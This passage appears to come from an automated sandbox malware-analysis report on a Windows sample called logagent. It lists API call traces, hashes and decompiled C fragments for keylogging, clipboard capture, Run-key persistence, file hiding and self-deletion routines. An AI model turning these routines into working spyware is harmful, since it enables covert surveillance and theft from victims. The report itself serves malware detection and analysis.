                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CreateThread.KERNEL32 ref: 00405C58
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • CreateThread.KERNEL32 ref: 00405C40
                                  • CreateThread.KERNEL32 ref: 00405C4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                  • String ID: Online Keylogger Started$[INFO]
                                  • API String ID: 3243250608-3343292223
                                  • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                  • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054FAA5 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 44clipboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E1054FAA5(intOrPtr* __ecx) {
				void* _t13;
				struct HWND__* _t19;
				void* _t30;
				void* _t31;

				_push(_t19);
				if( *__ecx() != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t19) != 0) {
						_t13 = GetClipboardData(1);
						_t30 = _t13;
						GlobalFix(_t30);
						_t28 = _t13;
						GlobalUnWire(_t30);
						CloseClipboard();
						if(_t13 == _t19) {
							_t28 = 0x415664;
						}
						 *0x415318(_t31 - 0x25);
						E10543A51(0x41be70, 0x6b, _t28);
					}
				}
				E1054316C(_t31 - 0x10);
				 *0x415348();
				 *0x415348();
				return 0;
			}







                                  0x1054faa5
                                  0x1054faaa
                                  0x1054fab0
                                  0x1054fab6
                                  0x1054fac5
                                  0x1054facd
                                  0x1054fad3
                                  0x1054fad6
                                  0x1054fadd
                                  0x1054fadf
                                  0x1054fae5
                                  0x1054faed
                                  0x1054faef
                                  0x1054faef
                                  0x1054fafe
                                  0x1054fb0b
                                  0x1054fb0b
                                  0x1054fac5
                                  0x10550033
                                  0x1055003b
                                  0x10550044
                                  0x10550050

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseGlobal$DataEmptyOpenWire
                                  • String ID: dVA
                                  • API String ID: 931577478-1571107130
                                  • Opcode ID: 0184a05d3131f65cd90b73fc5bb7c45af23118e502efa0db784828fb52c93016
                                  • Instruction ID: 3fc53a0e1b8c030d6c79959beb05b266a9e5851330eee6192903a9b6b508b74d
                                  • Opcode Fuzzy Hash: 0184a05d3131f65cd90b73fc5bb7c45af23118e502efa0db784828fb52c93016
                                  • Instruction Fuzzy Hash: 9C014F31610905DFDB04ABB4EC5CBEE3B69EF94392B508035F507C60A1EF708885CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E254 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E0040E254(void* __eax, void* __eflags) {
				void* _t7;
				void* _t9;
				void* _t28;

				_t33 = __eflags;
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
				E004017DD(_t28 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}






                                  0x0040e254
                                  0x0040e25d
                                  0x0040e266
                                  0x0040e273
                                  0x0040e27a
                                  0x0040e286
                                  0x0040e28d
                                  0x0040e29e
                                  0x0040e2aa
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                  • String ID: name
                                  • API String ID: 4248281052-1579384326
                                  • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                  • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411AF5 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00411AF5(void* __ecx, WCHAR* _a4) {
				char _v5;
				char _v6;
				void* _t13;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                  0x00411b08
                                  0x00411b1c
                                  0x00411b22
                                  0x00411b41
                                  0x00411b48
                                  0x00411b58

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                  • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                  • Sleep.KERNEL32(00002710), ref: 00411B48
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                  • String ID: Alarm has been triggered!$[ALARM]
                                  • API String ID: 4004766653-1190268461
                                  • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                  • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8FF Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040D8FF() {
				void* _t10;
				char* _t12;
				int _t13;
				char* _t15;
				signed int _t16;
				char* _t18;
				void* _t41;
				void* _t46;
				intOrPtr _t51;

				_t51 =  *0x41bf20; // 0x0
				 *0x41c119 = 0;
				if(_t51 != 0) {
					E004020F4(_t10, 0x41bf20);
				}
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t13 = atoi(_t12);
				E0040F572();
				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t16 = atoi(_t15);
				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
				E004017DD(_t46 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}












                                  0x0040d901
                                  0x0040d907
                                  0x0040d90d
                                  0x0040d914
                                  0x0040d914
                                  0x0040d928
                                  0x0040d933
                                  0x0040d93a
                                  0x0040d947
                                  0x0040d94c
                                  0x0040d957
                                  0x0040d95e
                                  0x0040d965
                                  0x0040d973
                                  0x0040d97a
                                  0x0040d985
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                  • atoi.MSVCRT ref: 0040D947
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                  • atoi.MSVCRT ref: 0040D965
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                  • atoi.MSVCRT ref: 0040D981
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                  • String ID:
                                  • API String ID: 2234106156-0
                                  • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                  • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10549F3B Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 1054C61B: TerminateProcess.KERNEL32(00000000,?,10549BE2), ref: 1054C62B
                                    • Part of subcall function 1054C61B: WaitForSingleObject.KERNEL32(000000FF,?,10549BE2), ref: 1054C63E
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1054A045
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1054A055
                                    • Part of subcall function 105486D0: UnhookWindowsHookEx.USER32(00000000), ref: 105486EE
                                  • _wgetenv.MSVCRT ref: 1054A0AF
                                    • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 1054A303
                                  • exit.MSVCRT ref: 1054A30F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteHookModuleNameObjectProcessShellSingleTerminateUnhookWaitWindows_wgetenvexit
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run\$TcA
                                  • API String ID: 408532493-1424891482
                                  • Opcode ID: 6ad41035b0cb7ce4584f9fe8de384f09d86570fee2b13a79108ac7d106b08e77
                                  • Instruction ID: e97cff4b71fadd8225e7ac675a81589aef3fba0f11d5477686f74cdcb265222b
                                  • Opcode Fuzzy Hash: 6ad41035b0cb7ce4584f9fe8de384f09d86570fee2b13a79108ac7d106b08e77
                                  • Instruction Fuzzy Hash: ABB1617290050DEBDB00EBE0ED5D9EE7B7CEF88345B644066F902E3090EB755A49CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10553719 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 210synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • mciSendStringW.WINMM(00000000), ref: 1055381C
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 1055385A
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 105538DC
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 10553921
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 10553932
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 10553942
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                  • String ID: stopped
                                  • API String ID: 1811012380-2795915500
                                  • Opcode ID: edb5fbe7797f5923e8e19f7f3829259e260694d50504d2670f9a5a4b20d31210
                                  • Instruction ID: 808b5e63c46b8587966f186a7f2202eafa8a868550e61cc1c0736f8531186118
                                  • Opcode Fuzzy Hash: edb5fbe7797f5923e8e19f7f3829259e260694d50504d2670f9a5a4b20d31210
                                  • Instruction Fuzzy Hash: 976172B199061DFFDB00AFA0DC99DFA3F7DEB44384B408026F906D70A1EA759D488B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105524AA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 187timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 105524AF
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 10552593
                                  • GetLocalTime.KERNEL32(?), ref: 10552640
                                  • _swprintf.MSVCRT ref: 10552683
                                    • Part of subcall function 105522CE: SHCreateMemStream.SHLWAPI(00000000), ref: 10552329
                                    • Part of subcall function 105522CE: DeleteFileW.KERNEL32(00000000), ref: 105523B1
                                  • atoi.MSVCRT ref: 10552731
                                  • atoi.MSVCRT ref: 1055275F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Createatoi$DeleteDirectoryFileH_prologLocalStreamTime_swprintf
                                  • String ID: <BA
                                  • API String ID: 489643954-295999847
                                  • Opcode ID: 1397e67a475f5d5496000406f8d320cffe048bc57ff684fc558b4ae63076313c
                                  • Instruction ID: 74cdb44f967d51c32c920a259b5b3c91e6c1c6cbbbca2a736adacd82fc2d724c
                                  • Opcode Fuzzy Hash: 1397e67a475f5d5496000406f8d320cffe048bc57ff684fc558b4ae63076313c
                                  • Instruction Fuzzy Hash: D6718371900519EBDB109BA0DC9DBEE7B78EF89341F1480AAF509E7090EF745A89CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10546F76 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 10546F96
                                    • Part of subcall function 10546EC1: CreateFileW.KERNEL32(00000000), ref: 10546EF8
                                    • Part of subcall function 10546EC1: GetFileSize.KERNEL32(00000000,00000000), ref: 10546F07
                                    • Part of subcall function 10546EC1: Sleep.KERNEL32(00002710), ref: 10546F36
                                    • Part of subcall function 10546EC1: CloseHandle.KERNEL32(00000000), ref: 10546F3D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 10546FD5
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 10546FE7
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 10546FFF
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 10547086
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 10547187
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
